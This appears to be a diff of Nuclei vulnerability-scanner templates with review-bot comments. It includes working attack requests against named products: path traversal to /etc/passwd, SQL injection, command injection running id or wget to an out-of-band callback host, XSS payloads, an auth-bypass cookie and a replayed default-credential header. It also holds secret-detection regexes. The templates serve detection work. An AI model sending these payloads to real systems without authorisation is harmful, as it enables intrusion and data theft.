- '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) ='
negative: true
part: body
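Review bot: `'^== Changelog =="'` ends with a stray `"` inside the single-quoted string, so it only matches a line that literally ends in `=="`, which a readme.txt heading will not; the neighbouring version regexes carry no such trailing character, so this looks like a typo that would silently break the `and` condition. The added `negative: true` matcher excluding patched versions is the right way to keep the version check from flagging fixed releases.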


@ -0,0 +1,27 @@
id: CVE-2020-35598
info:
name: Advanced Comment System 1.0 - Path Traversal
author: daffainfo
severity: high
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference: |
- https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,40 @@
id: CVE-2020-6637
info:
name: OpenSIS v7.3 unauthenticated SQL injection
author: pikpikcu
severity: high
description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
tags: cve,cve2020,sqli,opensis
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-6637
- https://cinzinga.com/CVE-2020-6637/
requests:
- method: POST
path:
- '{{BaseURL}}/account/index.php'
- '{{BaseURL}}/opensis/index.php'
- '{{BaseURL}}/index.php'
headers:
Content-Type: application/x-www-form-urlencoded
body: |
USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SQL STATEMENT:'
- "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
condition: and
- type: word
part: header
words:
- "text/html"
condition: and
- type: status
status:
- 200
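Review bot: `condition: and` under the header matcher is a no-op, since `text/html` is its only word; drop it. Matching on the exact echoed `UPDATE login_authentication …` statement together with `SQL STATEMENT:` is a specific, low-false-positive signal, so the rest of the matcher set is fine.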


@ -0,0 +1,25 @@
id: CVE-2020-7796
info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
reference: |
- https://www.adminxe.com/2183.html
tags: cve,cve2020,zimbra,ssrf,oob
requests:
- raw:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"


@ -7,7 +7,9 @@ info:
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
reference: |
- https://github.com/HoangKien1020/CVE-2021-21389
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389
- https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
tags: cve,cve2021,wordpress,wp-plugin,rce


@ -0,0 +1,28 @@
id: CVE-2021-21816
info:
name: D-LINK DIR-3040 - Syslog Information Disclosure
description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
author: gy741
severity: medium
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
tags: cve,cve2021,dlink,exposure,router
requests:
- method: GET
path:
- "{{BaseURL}}/messages"
matchers-condition: and
matchers:
- type: word
words:
- "syslog:"
- "admin"
- "/etc_ro/lighttpd/www"
part: body
condition: and
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2021-24235
info:
name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
tags: cve,cve2021,wordpress,xss,wp-theme
requests:
- method: GET
path:
- '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
matchers-condition: and
matchers:
- type: word
words:
- "input/Autofocus/%0D*/Onfocus=alert(123);"
- "goto-tour-list-js-extra"
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -5,7 +5,9 @@ info:
author: daffainfo
severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320
reference: |
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin
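Review bot: the unchanged `tags:` line still says `wp-plugin`, but the description calls Bello a WordPress theme, and the sibling CVE-2021-24235 template in this change uses `wp-theme`; switch to `wp-theme` so tag filtering stays consistent. While touching the file, the description has a typo, `in ints listing page`, which should read `in its listing page`.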
requests:

View File

@ -0,0 +1,38 @@
id: CVE-2021-27561
info:
name: YeaLink DM PreAuth RCE
author: shifacyclewala,hackergautam
severity: critical
description: A malicious actor can trigger Unauthenticated Remote Code Execution
tags: cve,cve2021,rce,yealink
reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
requests:
- method: GET
path:
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition: and
matchers:
- type: word
condition: and
part: body
words:
- 'uid'
- 'gid'
- 'groups'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "(u|g)id=.*"

View File

@ -64,5 +64,6 @@ requests:
words:
- "uid="
- "gid="
- "groups="
part: body
condition: and
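Review bot: making `groups=` a required token under `condition: and` tightens the match, but POSIX only requires `id` to print a `groups=` field when supplementary groups are present, so a successful injection on a minimal userland could now go unreported. `uid=` together with `gid=` is already specific enough; consider leaving `groups=` out of the required set.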

View File

@ -4,6 +4,7 @@ info:
author: madrobot
severity: critical
tags: hpe,cve,cve2021,bypass
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference: |
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203

View File

@ -0,0 +1,32 @@
id: CVE-2021-29484
info:
name: DOM XSS in Ghost CMS
author: rootxharsh,iamnoooob
description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site.
severity: medium
tags: cve,cve2021,xss,ghost
reference: |
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484
requests:
- method: GET
path:
- "{{BaseURL}}/ghost/preview"
matchers-condition: and
matchers:
- type: word
words:
- 'XMLHttpRequest.prototype.open'
part: body
- type: word
words:
- 'text/html'
part: header
- type: status
status:
- 200
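Review bot: the only body evidence is `XMLHttpRequest.prototype.open`, which is generic JavaScript and can appear in any page served under a `/ghost/preview` path, so nothing in the matchers ties the response to Ghost; add a Ghost-identifying token from the same page to the body matcher. The request also does not demonstrate script execution, it only shows the unused endpoint the description refers to is still present, so `name:` should say that this fingerprints the vulnerable endpoint rather than `DOM XSS in Ghost CMS`.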

View File

@ -4,6 +4,7 @@ info:
name: Ivanti Avalanche Directory Traversal
author: gy741
severity: high
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
tags: cve,cve2021,avalanche,traversal
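Review bot: the added description reads `allows remote unauthenticated user to access files`; it should be `allows a remote unauthenticated user to access files`, and naming the traversal parameter from the referenced advisory would make the sentence actually describe what the template sends.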

View File

@ -25,3 +25,8 @@ requests:
- "name:"
- "pass:"
condition: and
- type: word
words:
- "html>"
negative: true
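Review bot: the new negative matcher has no `part:`, so it applies to the body by default (which is what is wanted), but it only narrows the result if the template's `matchers-condition` is `and`; under the default `or`, a negative matcher that passes on any non-HTML response (a JSON 404, for example) would by itself produce a match. Please confirm the condition in the unchanged part of the file and write `part: body` explicitly so readers do not have to know the default.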

View File

@ -2,7 +2,7 @@ id: CVE-2021-3223
info:
name: Node RED Dashboard - Directory Traversal
author: gy741
author: gy741,pikpikcu
severity: high
description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
reference: |
@ -14,8 +14,16 @@ requests:
- method: GET
path:
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "Node-RED web server is listening"

View File

@ -0,0 +1,25 @@
id: CVE-2021-32305
info:
name: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
author: gy741
severity: critical
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-32305
- https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
tags: cve,cve2021,websvn,rce,oob
requests:
- raw:
- |
GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -0,0 +1,34 @@
id: CVE-2021-3297
info:
name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass
description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
author: gy741
severity: high
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-3297
- https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
tags: cve,cve2021,zyxel,auth-bypass,router
requests:
- raw:
- |
GET /status.htm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
cookie: language=en; login=1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Running Time"
- "Firmware Version"
- "Firmware Build Time"
condition: and
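Review bot: `Running Time`, `Firmware Version` and `Firmware Build Time` are labels found on many router status pages, and nothing in the matchers ties the response to a Zyxel NBG2105, so any device that serves `/status.htm` without authentication will be reported as this CVE; add a model-identifying token from the page, or send a baseline request without `login=1` and require that it does not match. Minor: the header is written as lowercase `cookie:`, which is valid, but the rest of the repository uses `Cookie:`.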

View File

@ -0,0 +1,24 @@
id: CVE-2021-36380
info:
name: Sunhillo SureLine - Unauthenticated OS Command Injection
description: The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
author: gy741
severity: critical
reference: |
- https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
tags: cve,cve2021,sureline,rce,oob
requests:
- raw:
- |
POST /cgi/networkDiag.cgi HTTP/1.1
Host: {{Hostname}}
command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -0,0 +1,36 @@
id: CVE-2021-37216
info:
name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
author: dwisiswant0
description: |
QSAN Storage Manager header page parameters does not filter special characters.
Remote attackers can inject JavaScript without logging in and launch
reflected XSS attacks to access and modify specific data.
reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
severity: medium
tags: cve,cve2021,xss,qsan
requests:
- method: GET
path:
- "{{BaseURL}}/http_header.php"
headers:
X-Trigger-XSS: "<script>alert(1)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"'
- type: word
part: header
words:
- "text/html"
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'x-xss-protection')"

View File

@ -0,0 +1,39 @@
id: CVE-202135336
info:
name: Unauthorised Remote Access of Internal Panel
author: Pratik Khalane
severity: critical
description: Finding the Tieline Admin Panels with default credentials.
reference: |
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login
# admin:password
requests:
- method: GET
path:
- '{{BaseURL}}/api/get_device_details'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: '{{BaseURL}}/assets/base/home.html'
Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
matchers-condition: and
matchers:
- type: word
words:
- "<SERIAL>"
- "<VERSION>"
condition: and
- type: word
words:
- "text/xml"
part: header
- type: status
status:
- 200
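Review bot: the template `id` is `CVE-202135336`, missing the hyphen; it must be `CVE-2021-35336` to match the NVD reference and the naming the rest of the `cves/` directory follows. More importantly, the `Authorization: Digest ...` header replays a fixed `nonce`, `cnonce`, `nc` and `response` captured from one device. A server that validates its own nonce will reject this regardless of the credentials, and one that accepts it is not being tested for `admin:password` at all, so the check does not generalise; the template has no way to use the nonce from the target's `WWW-Authenticate` challenge. Either document that limitation in the description or move this to a `default-logins/` template that uses an authentication flow the device also supports. The `author` value `Pratik Khalane` should be the contributor's handle, as elsewhere in the repository.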

View File

@ -4,7 +4,7 @@ info:
name: Oracle Business Intelligence Default Credentials
author: milo2012
severity: high
tags: oracle,dlogin
tags: oracle,default-login
requests:
- raw:

View File

@ -1,10 +1,10 @@
id: nameserver-detection
id: can-i-take-over-dns
info:
name: NS Detection
name: Can I Take Over DNS - Fingerprint
author: pdteam
severity: info
tags: dns,ns
tags: dns,ns,takeover
reference: https://github.com/indianajson/can-i-take-over-dns
dns:
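Review bot: renaming the `id` from `nameserver-detection` to `can-i-take-over-dns` is a breaking change for anyone filtering on the old id or correlating stored results; call it out in the PR description. The new `takeover` tag also raises expectations: per the new name the template only fingerprints NS records, it does not confirm a dangling delegation, so add a `description` saying a hit is a lead to verify against the referenced list, not a confirmed takeover.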

dns/dnssec-detection.yaml (new file, 22 lines)
View File

@ -0,0 +1,22 @@
id: dnssec-detection
info:
name: DNSSEC Detection
description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
author: pdteam
severity: info
tags: dns,dnssec
reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/
dns:
- name: "{{FQDN}}"
type: DS
class: inet
recursion: true
retries: 3
extractors:
- type: regex
group: 1
regex:
- "IN\tDS\t(.+)"

View File

@ -0,0 +1,31 @@
id: camunda-login-panel
info:
name: Camunda Login panel
author: alifathi-h1
severity: info
description: Default Credentials of demo:demo on Camunda application.
reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
tags: camunda,panel
requests:
- method: GET
path:
- '{{BaseURL}}/app/welcome/default/#!/login'
- '{{BaseURL}}/camunda/app/welcome/default/#!/login'
matchers-condition: and
matchers:
- type: word
words:
- "Camunda Welcome"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<footer cam-widget-footer version="v([0-9.]+)"'
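Review bot: both paths end in `#!/login`; the fragment is never sent to the server, so the requests are effectively `/app/welcome/default/` and `/camunda/app/welcome/default/`. Drop the fragment so readers are not misled into thinking a login page is fetched. The description `Default Credentials of demo:demo on Camunda application.` describes a default-login check the template does not perform (no credentials are submitted); either rephrase it as a panel detection or add the credential check as a separate `default-logins/` template.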

View File

@ -2,7 +2,7 @@ id: cerebro-panel
info:
name: Cerebro Panel
author: elder tao
author: huowuzhao,elder tao
severity: high
reference: https://github.com/lmenezes/cerebro
tags: panel,cerebro

View File

@ -4,7 +4,7 @@ info:
name: Tiki Wiki CMS Groupware
author: chron0x
severity: info
tags: panel
tags: panel,tikiwiki
requests:
- method: GET

View File

@ -1,7 +1,7 @@
id: appsec-yml-disclosure
id: appspec-yml-disclosure
info:
name: Appsec Yml Disclosure
name: Appspec Yml Disclosure
author: dhiyaneshDk
severity: medium
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json

View File

@ -8,16 +8,9 @@ info:
tags: config,git,exposure
requests:
- raw:
- |
GET /.git/config HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1
Connection: close
- method: GET
path:
- "{{BaseURL}}/.git/config"
matchers-condition: and
matchers:
@ -33,4 +26,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -0,0 +1,32 @@
id: github-gemfile-files
info:
name: Github Gemfiles
author: hahwul
severity: info
description: Find github page files(Gemfile / Gemfile.lock)
tags: github,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/Gemfile"
- "{{BaseURL}}/Gemfile.lock"
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "source")'
- 'contains(body, "gem")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(body, "https://rubygems.org")'
- 'contains(body, "remote")'
- 'contains(body, "specs")'
- 'status_code == 200'
condition: and
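Review bot: `source`, `gem`, `remote` and `specs` are short enough to occur in any page, and with `matchers-condition: or` both DSL matchers are applied to both `/Gemfile` and `/Gemfile.lock`, so a site that answers 200 with a generic page mentioning `https://rubygems.org` will match; anchor on the actual file syntax, for example `source "https://rubygems.org"` (or the single-quoted form) for the Gemfile and `GEM` followed by `remote: https://rubygems.org` for the lock file. The name `Github Gemfiles` and the `github` tag are misleading: the request goes to the target's own `{{BaseURL}}`, so this detects an exposed Gemfile on any host, not something GitHub-specific.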

View File

@ -0,0 +1,26 @@
id: github-page-config
info:
name: Github pages config file
author: hahwul
severity: info
description: Find github pages config file.
tags: github,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/_config.yml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "jekyll"
- "title"
- "baseurl"
condition: and
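Review bot: `title` and `baseurl` are generic words and `jekyll` carries the match, but the word matcher has no `part: body`; set it explicitly, since `_config.yml` may be served with a download content type. On a site actually published through GitHub Pages the `_config.yml` is normally public in the source repository anyway, so an `exposure` finding only matters when the file holds something it should not (tokens, internal hostnames); say so in the description. The same naming point as for the Gemfile template applies: this is a Jekyll config exposure check for any host, not only GitHub Pages.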

File diff suppressed because it is too large

View File

@ -26,7 +26,8 @@ requests:
part: body
regex:
- '(?i)key(up|down|press|boardnavigation)'
- '(?i)password(emailnotfoundmessage|label|errormessage|message)'
- '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message)'
- '(?i)keys_(close|previous|next|zoom|play_pause)'
condition: or
negative: true

View File

@ -2,7 +2,7 @@ id: private-key
info:
name: Private Key Detect
author: gaurang
author: gaurang,geeknik
severity: high
tags: token,file
@ -19,4 +19,6 @@ file:
- "\"BEGIN DSA PRIVATE KEY\""
- "\"BEGIN EC PRIVATE KEY\""
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
- "\"ssh-rsa\""
- "\"ssh-rsa\""
- "\"ssh-dsa\""
- "\"ssh-ed25519\""

View File

@ -13,4 +13,4 @@ file:
extractors:
- type: regex
regex:
- "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{10}/B[0-9A-Za-z\\-_]{10}/[0-9A-Za-z\\-_]{23}"
- "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}"

View File

@ -1,7 +1,7 @@
id: square-access-token
info:
name: Square Accesss Token
name: Square Access Token
author: gaurang
severity: high
tags: token,file
@ -13,4 +13,4 @@ file:
extractors:
- type: regex
regex:
- "sq0atp-[0-9A-Za-z\\-_]{22}"
- "sq0atp-[0-9A-Za-z\\-_]{22}"

file/xss/dom-xss.yaml (new file, 46 lines)
View File

@ -0,0 +1,46 @@
id: dom-xss
info:
name: DOM XSS Sources & Sinks
reference: Inspired by https://portswigger.net/blog/introducing-dom-invader
# The existence of a sink or source does not by itself indicate a vulnerability. Due diligence must be performed on the results before opening a bug report.
author: geeknik
severity: info
tags: xss,file
file:
- extensions:
- js
- ts
- html
- php
- cs
- rb
- py
extractors:
- type: regex
name: sink
part: body
regex:
- 'jQuery(\.globalEval|\.\$|\.constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)'
- 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse'
- 'fetch(\.body)?'
- 'history(\.pushState|\.replaceState)'
- '(session|local)Storage(\.setItem(\.name|\.value))'
- 'anchor(\.href|\.target)'
- 'button(\.formaction|\.value)'
- 'set(Timeout|Interval|Immediate)'
- 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)'
- 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)'
- 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))'
- 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?'
- 'iframe(\.srcdoc|\.src)'
- 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)'
- type: regex
name: source
part: body
regex:
- 'location(\.href|\.hash|\.search|\.pathname)?'
- 'window\.name'
- 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)'
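Review bot: several sink patterns are unanchored substrings, so `eval` matches `evaluate`, `Function` matches `Functional`, and `location(...)?` with its optional group matches every occurrence of `location` (including `allocation`); wrap identifiers in `\b...\b` and drop the optional group. `RegExp`, `JSON\.parse` and `fetch` are not script-execution sinks in themselves and will dominate the output. `fetch(\.body)?` appears both inside the long `eval|Function|...` alternation and again as its own entry, and `location` is listed under both `sink` and `source`, so every hit is reported twice; `\.attr.onmousedown` in the jQuery pattern is also missing the escape on the second dot. The comment under `reference:` about due diligence is the right caveat and belongs in `description:` so it reaches the scan output.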

View File

@ -0,0 +1,44 @@
id: prestashop-module-fuzz
info:
name: Prestashop Modules Enumeration
author: meme-lord
severity: info
tags: fuzz,prestashop
requests:
- payloads:
path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
raw:
- |
GET /modules/{{path}}/config.xml HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
matchers-condition: and
matchers:
- type: word
words:
- "<module>"
- "<name>"
- "<displayName>"
- "<is_configurable>"
- "</module>"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 2
regex:
- '<version>(<!\[CDATA\[)?([0-9.]+)'
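Review bot: `threads: 50` sends 50 concurrent requests per target across a roughly 640-entry wordlist, which is aggressive for an `info`-severity enumeration; lower it or leave concurrency to the user's command-line setting. The `Accept: application/json, text/plain, */*` header does not match the XML being requested (`config.xml`); drop it or use `application/xml`. A short description stating that a 200 with `<module>...</module>` only confirms the module directory exists (not that the module is vulnerable) would help consumers of the output; the `<version>` extractor with `group: 2` is correct for the optional CDATA prefix.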

View File

@ -0,0 +1,639 @@
1attributewizardpro
AddGoogleStructuredData
AddGoogleTagManager
Back-to-Top-Module-Prestashop-1.7
CBAMP
ChangeOrderIndex
EuCookieSmart
NetLicensing-PrestaShop
PS-Get-Free-Shipping
PS-Sendy
PayPal
PrestaShop-Module-Image-Rollover
PrestaShop-module-Pays
PrestaShop3D
PrestaShop_1.6.0.9_Ukraine
Prestashop-BBL-Bankwire
Prestashop-ProductsScripsAndCss
Prestashop-SCB-Bankwire
Rasa-Integration-Project
Rave-Payment-Gateway-for-Prestashop-1.7
SMSIR-Prestashop
Security-Lite
SimpleCatalog
TurkPos-Sanal-Pos-Uygulamasi-Prestashop-Modulu
a2hosting
a_crisp
activecampaign
adminlistproduct
adpmicrodatos
adscale
adv_customer
advancedeucompliance
advancedexport
advancedslider
algolia
alipay
also
amazzingfilter
amzpayments
angarbanners
angarcmsinfo
angarfacebook
artisan-doc
attributewizardpro
attributewizardpro.OLD
attributewizardpro_x
attributwizardpro
authorizeaim
autoindex
autoupgrade
azleasyssl
ba_prestashop_invoice
backwardcompatibility
bamegamenu
bankwire
becommerce
blackholebots
blockadvertising
blockbanner
blockbestsellers
blockcart
blockcategories
blockcms
blockcmsinfo
blockcontact
blockcontactinfos
blockcounterz
blockcurrencies
blockcustomergroup
blockcustomerprivacy
blockfacebook
blocklanguages
blocklayered
blocklink
blockmanufacturer
blockmyaccount
blockmyaccountfooter
blocknewproducts
blocknewsletter
blockpaymentlogo
blockpermanentlinks
blockreassurance
blockreinsurance
blockrss
blocksearch
blocksharefb
blocksocial
blockspecials
blockstore
blocksupplier
blocktags
blocktopmenu
blockuserinfo
blockviewed
blockwishlist
bluesnap
bnclearcarts
bonmarkup
boxdropshipment
boxtal-connect-prestashop
bpostshm
brainweboptionaldni
brinkscheckout
bvkpaymentfees
carriercompare
cartabandonmentpro
cartabandonmentproOld
cashondelivery
checkyourdata
cheque
chronopost
cleancarroussel
cleverppc
clickline
clientlogin
cloudswipe-prestashop
codwfeeplus
columnadverts
columnadverts2
compta-vente
connect2pay-prestashop-module
contactform
convermax
countdowntimerbar
cronjobs
crossselling
customerfield
customers
cy_multibankwire
dashactivity
dashgoals
dashproducts
dashtrends
dateofdelivery
deactivateproducts
demo-cqrs-hooks-usage-module
demonstration
desjardins
doctrine
dotpay
dpdfrance
dpdgroup
dpdpoland
easymarketing
ebay
ecopresto
editorderpro
editorial
emailgenerator
emarketing
envoimoinscher
erpillicopresta
esat-prestashop
etdoptimizer
etranslation
eurovatgenerator
everblock
everpsblog
everpsclickandcollect
everpscss
everpscustomerconnect
everpsorderoptions
everpspopup
example-modules
example_module_mailtheme
expresscache
expressmailing
faceshop
famebit
fasardixml
favicon_notification
favoriteproducts
fbsample-addcolumninprodlist
fbsample-advconfig
fbsample-bocontroller
fbsample-bologactivity
fbsample-botraining
fbsample-callbundle
fbsample-console
fbsample-extracustomerfield
fbsample-jsaddvariable
fbsample-order
fbsample-orderconditions
fbsample_legacyvsmodern
fbsample_messageoftheday
fedexcarrier
feedaty
feeder
fianetfraud
fianetsceau
fieldbannerslider
fieldbestsellers
fieldblockcategories
fieldblocksearch
fieldblockwishlist
fieldblogcategories
fieldblogpopularposts
fieldblogrecentposts
fieldblogsearch
fieldblogtags
fieldbrandslider
fieldcompare
fieldcustomaddtabs
fieldhtmlblock
fieldmegamenu
fieldonecateproductslider
